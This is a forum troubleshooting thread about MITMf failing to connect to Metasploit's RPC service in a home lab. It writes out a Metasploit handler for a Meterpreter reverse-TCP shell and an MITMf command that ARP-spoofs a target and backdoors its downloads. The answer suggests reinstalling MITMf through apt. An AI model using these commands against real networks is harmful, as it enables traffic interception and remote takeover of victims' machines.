# MITMF Is not connecting Metasploit (HTTP Injection)

Tags: man-in-the-middle, mitmf

I am attempting to inject malicious payload into http request. I own a personal lamp server, a Kali VM and a the most WindowsXP VM imaginable. and everything is on my network and legal. I have been following this tutorial.

https://youtu.be/FMahvXMYuT4

I ran metasploit with the following

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8843
exploit -j
```

When watching the video, Metasploit says

```
[*] Starting the payload handler...
```

On my end, it starts by saying that, then brings me back to the console. Odd, but whatever I guess.

Now I am trying to run mitmf in a different terminal window

```
sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn
```

Now this is the error message I am receiving from mitmf.

```
    [*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ FilePwn v0.3
|  |_ BDFProxy v0.3.2 online
2018-07-17 02:23:27 [ARPpoisoner] Restoring connection 192.168.1.244 <-> 192.168.1.1 with 2 packets per host
[Msfrpc] Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=55552): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd9b7772290>: Failed to establish a new connection: [Errno 111] Connection refused',))
```

I did some googling and I found this thread.

https://github.com/byt3bl33d3r/MITMf/issues/343

I followed his 2 command instructions instructions and started the whole process over again with no luck. I even tried changing the LPORT to 55552 but that failed as well. I am not an expert with Metasploit so I wouldn't even begin to know what to look for. How can I further troubleshoot this?

Comment: from the error message, mitmf timesout when connecting to the service on that port, which is not surprising if msf isn't running a handler on that port

Comment: Are you suggesting I change LPORTS? I have changed them to both 55552 and  8843. In either case, the problem was that the installation instructions failed where as an apt-get install worked.

Answer (score 0):

If you are using Kali Linux, resolve this by using the following command to install MITMf

```
apt-get install mitmf
```

Even if the original instructions provided by the software author work as expected with no errors, they are still tragically awful.